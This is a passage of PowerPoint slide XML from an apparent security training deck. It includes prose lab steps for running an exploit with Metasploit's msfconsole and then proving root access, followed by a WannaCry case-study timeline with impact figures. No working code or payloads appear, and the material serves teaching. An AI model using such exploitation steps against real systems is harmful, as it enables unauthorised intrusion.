                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Search for it in msfconsole and read the module info before you run anything</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Set the options, check what LHOST needs to be, and run the exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Confirm what user you landed as, then prove it: hostname, id, and one file only root can read</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>If it fails, read the error. Wrong LHOST and a missing listener cause most failures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>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53</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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07 / CASE STUDY 1</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WannaCry, 12 May 2017</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54</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1444752"/>
            <a:ext cx="11064240" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2170"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A worm that needed no email, no click and no user. If the machine was powered on and port 445 was reachable, it was encrypted.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="2688336"/>
            <a:ext cx="9555480" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261872" y="2624328"/>
            <a:ext cx="128016" cy="128016"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="701DF5"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="0B0711"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="320040" y="2286000"/>
            <a:ext cx="2011680" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>14 MAR 2017</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="2852928"/>
            <a:ext cx="2103120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Microsoft ships MS17-010, patching the SMBv1 flaw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3650742" y="2624328"/>
            <a:ext cx="128016" cy="128016"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="701DF5"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="0B0711"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2708910" y="2286000"/>
            <a:ext cx="2011680" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>14 APR 2017</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2663190" y="2852928"/>
            <a:ext cx="2103120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Shadow Brokers publish the stolen EternalBlue exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6039612" y="2624328"/>
            <a:ext cx="128016" cy="128016"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="701DF5"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="0B0711"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5097780" y="2286000"/>
            <a:ext cx="2011680" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>12 MAY 2017</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5052060" y="2852928"/>
            <a:ext cx="2103120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WannaCry starts spreading, roughly 10000 machines an hour</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8428482" y="2624328"/>
            <a:ext cx="128016" cy="128016"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="701DF5"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="0B0711"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7486650" y="2286000"/>
            <a:ext cx="2011680" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>12 MAY, +7h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7440930" y="2852928"/>
            <a:ext cx="2103120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A researcher registers the kill switch domain and slows it down</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10817352" y="2624328"/>
            <a:ext cx="128016" cy="128016"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF6B6B"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="0B0711"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9875520" y="2286000"/>
            <a:ext cx="2011680" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>AFTER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9829800" y="2852928"/>
            <a:ext cx="2103120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Around 200000 machines in more than 150 countries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4224528"/>
            <a:ext cx="3593592" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="4334256"/>
            <a:ext cx="3017520" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>59</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="4983480"/>
            <a:ext cx="3063240" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>days between the patch and the outbreak</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="4224528"/>
            <a:ext cx="3593592" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="4334256"/>
            <a:ext cx="3017520" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>48</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="4983480"/>
            <a:ext cx="3063240" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>NHS trusts disrupted, about 20000 appointments cancelled</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Shape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8138160" y="4224528"/>
            <a:ext cx="3593592" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
